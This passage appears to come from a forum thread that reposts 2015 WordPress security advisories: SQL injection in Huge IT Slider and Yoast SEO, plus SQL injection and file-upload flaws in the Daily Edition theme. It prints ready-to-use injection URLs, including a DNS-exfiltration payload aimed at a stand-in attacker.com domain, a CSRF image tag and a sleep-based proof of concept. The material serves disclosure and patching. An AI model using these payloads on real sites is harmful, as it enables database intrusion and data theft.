  23. Advisory ID: HTB23250 Product: Huge IT Slider WordPress Plugin Vendor: Huge-IT Vulnerable Version(s): 2.6.8 and probably prior Tested Version: 2.6.8 Advisory Publication: February 19, 2015 [without technical details] Vendor Notification: February 19, 2015 Vendor Patch: March 11, 2015 Public Disclosure: March 12, 2015 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-2062 Risk Level: Medium CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Huge IT Slider WordPress Plugin. This vulnerability can be exploited by website administrators as well as anonymous attackers to inject and execute arbitrary SQL queries within the application’s database. 1) SQL injection in Huge IT Slider WordPress plugin: CVE-2015-2062 The vulnerability exists due to insufficient filtration of input data passed via the "removeslide" HTTP GET parameter to "/wp-admin/admin.php" script when "task" parameter is set to "popup_posts" or "edit_cat". A remote authenticated attacker with administrative privileges can execute arbitrary SQL queries within the application’s database. Below are two simple exploit codes that are based on DNS Exfiltration technique. They can be used if the database of the vulnerable application is hosted on a Windows system. The codes will send a DNS request requesting IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker). 1. Exploit example for "task=popup_posts": http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 2. Exploit example for "task=edit_cat": http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=edit_cat&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- This vulnerability can be also exploited remotely by non-authenticated attackers using CSRF vector, since the web application is also prone to Cross-Site Request Forgery attacks. The attacker could use the following exploit code against authenticated website administrator to determine version of installed MySQL server: <img src="http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --"> ----------------------------------------------------------------------------------------------- Solution: Update to Huge IT Slider 2.7.0 More Information: https://wordpress.org/support/topic/huge-it-slider-security-vulnerability-notification-sql-injection ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23250 - https://www.htbridge.com/advisory/HTB23250 - SQL Injection in Huge IT Slider WordPress Plugin. [2] Huge IT Slider WordPress Plugin - http://huge-it.com/ - Huge IT slider is a convenient tool for organizing the images represented on your website into sliders. Each product on the slider is assigned with a relevant slider, which makes it easier for the customers to search and identify the needed images within the slider. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
  24. A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of Millions of websites at risks of being hacked by the attackers. The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 Million downloads according to Yoast website, making it one of the most popular plugins of WordPress for easily optimizing websites for search engines i.e Search engine optimization (SEO). The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’. All the versions prior to of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw, according to an advisory published today. SQL injection (SQLi) vulnerabilities are ranked as critical one because it could cause a database breach and lead to confidential information leakage. Basically in SQLi attack, an attacker inserts a malformed SQL query into an application via client-side input. HOW YOAST VULNERABILITY WORKS However, in this scenario, an outside hacker can’t trigger this vulnerability itself because the flaw actually resides in the 'admin/class-bulk-editor-list-table.php' file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only. Therefore, in order to successfully exploit this vulnerability, it is required to trigger the exploit from authorized users only. This can be achieved with the help of social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL. If the authorized WordPress user falls victim to the attack, this could allow the exploit to execute arbitrary SQL queries on the victim WordPress web site, Ryan explained to security blogger Graham Cluley. Ryan also released a proof-of-concept payload of Blind SQL Injection vulnerability in ‘WordPress SEO by Yoast’, which is as follows: http://victim-wordpress-website.com/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc PATCH FOR YOAST SQLi VULNERABILITY However, the vulnerability has reportedly been patched in the latest version of WordPress SEO by Yoast (1.7.4) by Yoast WordPress plugin developers, and change log mentions that latest version has "fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor." Generally, it has been believed that if you have not installed WordPress Yoast for SEO, then your WordPress website is seriously incomplete. The vulnerability is really serious for website owners who wish to increase their search engine traffic by using this plugin. Therefore, WordPress administrators with disabled Auto-update feature are recommended to upgrade their WordPress SEO by Yoast plugin as soon as possible or they can manually download the latest version from WordPress plugin repository. If you have installed WordPress 3.7 version and above, then you can enable fully automate updating of your plugins and themes from Manage > Plugins & Themes > Auto Updates tab.
  25. *WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id Parameters SQL Injection Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.2 Tested Version: v1.6.2 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Version:* WordPress Daily Edition Theme v1.6.2 *Vendor URL & Download:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. *(2.1)* The code flaw occurs at "fiche-disque.php?" page with "&id" parameter. *References:* http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/27 http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source *WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src Parameter Unrestricted Upload of File Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.2 Tested Version: v1.6.2 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Version:* WordPress Daily Edition Theme v1.6.2 *Vendor URL & Download:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by "Unrestricted Upload of File" (Arbitrary File Uploading) attacks. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote or local host . This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host. *(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameters. *References:* http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/4 http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source
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